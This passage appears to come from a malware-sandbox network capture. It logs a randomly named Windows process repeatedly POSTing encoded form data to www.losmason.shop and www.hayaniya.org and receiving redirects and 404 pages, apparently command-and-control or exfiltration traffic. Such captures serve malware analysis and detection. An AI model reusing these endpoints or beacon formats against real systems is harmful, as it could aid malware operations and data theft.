                                                                        Nov 28, 2024 09:14:17.488001108 CET469INData Raw: 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d
                                                                        Data Ascii: er> <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549847104.18.73.116802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:23.252281904 CET799OUTPOST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2b 42 36 6f 4a 68 77 38 38 37 47 6c 66 2b 48 4c 2b 4c 6f 73 37 75 4c 7a 79 33 36 54 56 39 47 31 5a 77 58 42 4c 37 47 2b 57 65 6c 77 6f 46 30 43 4f 52 6d 62 33 31 62 42 31 78 44 6a 55 78 55 48 75 4d 4f 47 6f 53 38 6e 33 41 64 44 75 4e 35 45 56 49 2f 62 47 5a 6c 58 32 6f 73 49 33 43 55 37 43 5a 76 38 74 38 34 33 59 65 62 4c 30 79 67 75 52 67 6d 32 4c 52 47 70 49 6f 65 42 4e 6c 6f 78 67 31 68 54 4c 64 6e 77 4c 58 68 4a 62 76 77 6c 2b 68 55 53 47 56 6c 61 2b 4e 4d 32 63 38 74 76 65 69 46 6f 71 65 44 34 7a 67 64 5a 42 44 30 5a 6a 6d 64 55 4c 34 70 34 4f 64 34 3d
                                                                        Data Ascii: QhKxhNP=Ed4ppQsMn5Ty+B6oJhw887Glf+HL+Los7uLzy36TV9G1ZwXBL7G+WelwoF0CORmb31bB1xDjUxUHuMOGoS8n3AdDuN5EVI/bGZlX2osI3CU7CZv8t843YebL0yguRgm2LRGpIoeBNloxg1hTLdnwLXhJbvwl+hUSGVla+NM2c8tveiFoqeD4zgdZBD0ZjmdUL4p4Od4=
                                                                        Nov 28, 2024 09:14:24.466510057 CET565INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:24 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=C1pllo1AaAyIRQhUKZP7QgT7_DhqlC4a.bZQZdfoyTU-1732781664-1.0.1.1-xeekNEKNVssY_53bE044bJsiIansZGRLaSQnDTeSQtUvdkQk05TZe4xgGfk8fXsuPOvBTBg1IokNRyQr7.yB2w; path=/; expires=Thu, 28-Nov-24 08:44:24 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e7795886421c-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549852104.18.73.116802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:25.920182943 CET819OUTPOST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 53 31 41 53 50 42 49 2f 79 2b 59 2b 6c 77 38 56 30 39 4b 52 6d 41 33 31 58 6a 31 77 2f 6a 55 78 51 48 75 4a 79 47 6f 68 45 67 32 51 64 4e 68 74 35 47 61 6f 2f 62 47 5a 6c 58 32 6f 34 69 33 43 4d 37 43 71 48 38 73 64 34 30 62 65 62 45 7a 79 67 75 62 41 6d 79 4c 52 47 62 49 70 79 37 4e 6a 30 78 67 77 6c 54 4c 49 54 7a 43 58 68 54 44 50 78 79 2f 78 78 68 43 79 46 68 68 2b 39 2b 63 39 42 70 57 30 30 43 77 38 4c 51 67 41 78 68 52 51 38 75 79 57 38 39 52 62 35 49 51 4b 75 53 35 63 76 52 43 65 38 54 64 61 48 31 32 68 34 6b 6f 6a 42 45
                                                                        Data Ascii: QhKxhNP=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPS1ASPBI/y+Y+lw8V09KRmA31Xj1w/jUxQHuJyGohEg2QdNht5Gao/bGZlX2o4i3CM7CqH8sd40bebEzygubAmyLRGbIpy7Nj0xgwlTLITzCXhTDPxy/xxhCyFhh+9+c9BpW00Cw8LQgAxhRQ8uyW89Rb5IQKuS5cvRCe8TdaH12h4kojBE
                                                                        Nov 28, 2024 09:14:27.131989002 CET565INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=8rjfd1uH4ls1.DBWCn7wq54ZZVcAbVJISo9JahFpNUY-1732781666-1.0.1.1-OaGxq_Ncwk1pusH6nOuZBVJquc2Bs5lfeFpzDjHhJucfF5PrcoNPknnNUCZIcFZEY84PhtlgSNIvoszCdmO8Xw; path=/; expires=Thu, 28-Nov-24 08:44:26 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e789f9530f41-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549859104.18.73.116802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:28.590991020 CET1836OUTPOST /s15n/ HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.losmason.shop
                                                                        Referer: http://www.losmason.shop/s15n/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2f 68 71 6f 61 51 77 38 74 4c 47 6b 43 4f 48 4c 6e 62 6f 6f 37 75 50 7a 79 32 2f 57 57 50 71 31 63 33 62 42 4c 65 79 2b 5a 2b 6c 77 6a 6c 30 38 4b 52 6e 43 33 31 66 6e 31 77 7a 56 55 79 34 48 68 4c 4b 47 71 51 45 67 76 41 64 4e 6a 74 35 46 56 49 2f 4b 47 5a 31 54 32 6f 6f 69 33 43 4d 37 43 73 37 38 38 38 34 30 55 2b 62 4c 30 79 67 79 52 67 6e 56 4c 52 65 68 49 70 32 72 4b 56 45 78 67 51 31 54 59 75 50 7a 44 33 68 56 57 50 78 36 2f 78 4e 2b 43 7a 73 50 68 2f 4a 55 63 2b 68 70 48 51 31 43 73 2b 44 32 31 51 74 53 44 68 67 5a 6e 6d 38 61 66 62 35 62 51 4c 36 33 39 50 54 70 44 4f 59 38 55 4f 47 42 31 6c 4a 32 74 33 73 73 57 52 2b 35 65 4f 36 56 64 2f 4c 50 34 76 61 43 34 4c 45 53 77 44 43 6a 50 59 47 39 55 50 4a 51 69 45 63 69 35 72 30 45 36 38 43 57 43 6f 6d 4b 37 33 2b 74 39 45 2b 71 79 51 4e 30 68 47 46 57 42 51 6f 2b 4e 49 32 42 4f 34 2b 64 69 54 62 59 66 38 57 6b 39 72 56 58 59 5a 46 36 71 6f 7a 71 61 50 67 6a 38 78 47 71 41 53 71 61 54 49 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPq1c3bBLey+Z+lwjl08KRnC31fn1wzVUy4HhLKGqQEgvAdNjt5FVI/KGZ1T2ooi3CM7Cs788840U+bL0ygyRgnVLRehIp2rKVExgQ1TYuPzD3hVWPx6/xN+CzsPh/JUc+hpHQ1Cs+D21QtSDhgZnm8afb5bQL639PTpDOY8UOGB1lJ2t3ssWR+5eO6Vd/LP4vaC4LESwDCjPYG9UPJQiEci5r0E68CWComK73+t9E+qyQN0hGFWBQo+NI2BO4+diTbYf8Wk9rVXYZF6qozqaPgj8xGqASqaTIsppoMIBQU++e/IOweSFd9PYfFSE2VMDS+dk5jCPqjHKdWmcbuU/mECGmKBv8ZmjqRFcKVnuBsajrhvylV65gH/36IWTIc4SdrE1RuSC/ru9fiURBSZ2Da7Qoc7sU0dvY7KbKvHwYLN30/U05fNka4mGE/1Bfw0CpwsQOszoKMclNfnaNetrL3Bnn2etBYhnGzOnEurefCBlmM5ag1TvhkwfGZ2qxuKD1BLsN1D7pD7p5uqe2tAdWB+JrrBy8WWXrXpFlBehbRaxDn8ABFbYn6SJXtyq3QtN6L4dZOeKcaz6S0ya895pmAkp1D9P7qw+k/fZ82qMr8KdpPjarSe7DBgZFd2MIQ4Ljh38+ksLr1QKb7kiNsvOV1G0Pp23r+13+JtIcrDHSHUHud/RTOz/hmWb2ST4lDAh9UwgC6WzjNV4C+9lK+9tltSUqX0zUe7cqgqgmW3jHEV6PaCAZ0jYBpw80B+y3H0sGEOosHSQ6cGEhtejQzDkKll5pRtMcv5YOi5neyWLD6xb7ZTyWr9+XDt4bizXM67ZvkRaPg61WZItruQ/hBv3MQjHiHd6diJfG8mqlztBhFuGPgy8Na916Z1p69SC3G1aKHlFjI3VNx5hjpro8HvD5q2jVRRS3rpHxSme1+bl4fP1PAJhHa82Re89S+MP8ou2a+v [TRUNCATED]
                                                                        Nov 28, 2024 09:14:29.851568937 CET565INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:29 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=79GNL7qBjZ1HFD3zF3vWe0YbT6oOA0lWQ3wWmRFt3ug-1732781669-1.0.1.1-Rly96edvW6YqPhW0_HLr7_3PgShU_wAfVMPTtz6mRMDFNQVRVG2e7Sr3YXKq1v5OJAB7ffkk6u6W.DAz.hzE9g; path=/; expires=Thu, 28-Nov-24 08:44:29 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e79afbe24407-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.549866104.18.73.116802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:31.239773035 CET543OUTGET /s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.losmason.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:32.413784027 CET721INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Location: https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHxTYP3MQRZc2DBo1D75Es8xJLJq3ZosxOeO3P23AwVQ3aXA==&Yby=d2ydCtHpb8
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Set-Cookie: __cf_bm=MqclvvysC9ygRf26G1VadZ0gddqDfvUJRXirjWimmKc-1732781672-1.0.1.1-di1y49ge.tufH9SXqcoSag6iWbWluLsRvlH7Jq7gPnMENGDS6t3EcsxNp4lOUQja.ZbLpZQKIitoFaXbCa5tCQ; path=/; expires=Thu, 28-Nov-24 08:44:32 GMT; domain=.www.losmason.shop; HttpOnly
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e98e7ab08ee8cc5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.549882192.185.147.100802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:38.398060083 CET796OUTPOST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 72 68 67 6f 58 36 71 57 44 53 61 68 6a 4c 34 76 69 41 5a 57 73 63 2b 48 48 34 41 6b 73 6b 36 55 66 79 67 33 4c 61 30 49 41 31 49 6d 53 54 56 6a 4e 4e 2b 31 4d 75 4c 69 6d 53 44 64 77 65 69 6b 67 43 2b 37 53 61 2f 61 73 4e 71 4d 4b 44 47 47 4e 44 76 59 46 6f 44 6c 43 70 4f 61 7a 2f 58 6b 6e 30 2b 38 62 4d 59 7a 33 46 76 67 6e 72 46 33 43 59 36 55 4a 56 74 4e 30 77 2f 32 6a 55 4f 7a 6d 75 73 4e 7a 76 34 30 54 78 46 45 63 79 76 65 31 5a 6e 65 76 37 76 72 71 65 48 63 43 67 53 72 59 43 68 4d 77 68 36 4d 49 44 74 76 34 66 4c 71 6a 5a 50 6d 78 4c 72 35 66 5a 55 3d
                                                                        Data Ascii: QhKxhNP=VXBo7Mv86w/xrhgoX6qWDSahjL4viAZWsc+HH4Aksk6Ufyg3La0IA1ImSTVjNN+1MuLimSDdweikgC+7Sa/asNqMKDGGNDvYFoDlCpOaz/Xkn0+8bMYz3FvgnrF3CY6UJVtN0w/2jUOzmusNzv40TxFEcyve1Znev7vrqeHcCgSrYChMwh6MIDtv4fLqjZPmxLr5fZU=
                                                                        Nov 28, 2024 09:14:39.920085907 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:14:39 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                        Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                        Nov 28, 2024 09:14:39.920327902 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                        Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                        Nov 28, 2024 09:14:39.920341969 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                        Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                        Nov 28, 2024 09:14:39.921283007 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                        Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                        Nov 28, 2024 09:14:39.921294928 CET1236INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                                        Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                                        Nov 28, 2024 09:14:39.922418118 CET1236INData Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                                        Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                                        Nov 28, 2024 09:14:39.922430038 CET1236INData Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                                        Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                                        Nov 28, 2024 09:14:39.923332930 CET1236INData Raw: e1 ee d1 d2 5c a9 cf 4f 45 1d fd 38 5b 8a 1b 2e bc 79 c6 8c 6a 4c 39 91 46 d5 c7 92 90 23 1f 47 08 34 48 b8 4b dc b2 cb b6 26 59 c1 6a 07 d4 6a 36 d7 c4 b1 91 b6 5d 1b 5d cf f1 5a 03 5c 21 7b d5 b3 4a b6 6e ac 77 ac df 70 4a 5d 9f 28 34 95 38 aa
                                                                        Data Ascii: \OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJf;0>b+gXfXQoV;"r#mFTmHmN2[XTS@=*B1Qr}%AV[8s*(H.`{L=>-&0@O?hnV
                                                                        Nov 28, 2024 09:14:39.923345089 CET1236INData Raw: 6c fe 64 c9 d2 d8 4a 58 f6 cd ed 2b 10 a6 f0 a9 e0 22 9c 6d f2 e5 60 45 7c 21 ab 91 4e 6f 30 b8 8c b4 b2 ac a2 56 bb 5b 61 af c2 42 21 a8 82 c2 3a 16 16 d2 f9 2b 30 f0 0a d0 ae eb a5 02 fc 0a 60 9d 24 56 22 ac 81 ba ee 0f 70 8c 9c 80 32 57 12 5e
                                                                        Data Ascii: ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&UuyWuV8/VuNf]u.(|hUeL_?;m6!vZrPN
                                                                        Nov 28, 2024 09:14:39.924310923 CET1236INData Raw: af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6 7f 4a bf cf a4 77 8b f4 76 87 3f 12 bb 6b 24 3a cb 24 7b 54 55 e4 46 6a 11 ee 95 6a 5f d8 6f 21 e1 6d ac
                                                                        Data Ascii: :BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8"*4\J5PJ+A


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        10192.168.2.549888192.185.147.100802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:41.058192015 CET816OUTPOST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 52 53 55 66 54 51 33 4d 59 4d 49 4e 56 49 6d 47 44 56 69 44 74 2b 41 4d 75 47 64 6d 54 2f 64 77 65 6d 6b 67 48 61 37 54 70 6e 5a 73 64 71 4f 4c 7a 47 45 54 7a 76 59 46 6f 44 6c 43 70 79 38 7a 2f 50 6b 6b 47 71 38 5a 75 38 77 30 46 76 6a 6b 72 46 33 56 6f 36 51 4a 56 74 2f 30 78 69 74 6a 53 4b 7a 6d 73 6b 4e 32 75 34 33 45 68 46 4f 59 79 75 75 6c 5a 7a 56 6d 6f 6e 32 75 49 4f 44 58 47 53 39 64 30 51 6d 71 44 79 6b 62 6a 42 58 6f 4d 44 64 79 70 75 50 72 6f 37 4a 42 4f 42 67 58 78 70 36 76 2b 68 64 4a 70 68 31 31 42 49 4e 6e 49 6b 78
                                                                        Data Ascii: QhKxhNP=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvRSUfTQ3MYMINVImGDViDt+AMuGdmT/dwemkgHa7TpnZsdqOLzGETzvYFoDlCpy8z/PkkGq8Zu8w0FvjkrF3Vo6QJVt/0xitjSKzmskN2u43EhFOYyuulZzVmon2uIODXGS9d0QmqDykbjBXoMDdypuPro7JBOBgXxp6v+hdJph11BINnIkx
                                                                        Nov 28, 2024 09:14:42.540067911 CET1236INHTTP/1.1 404 Not Found
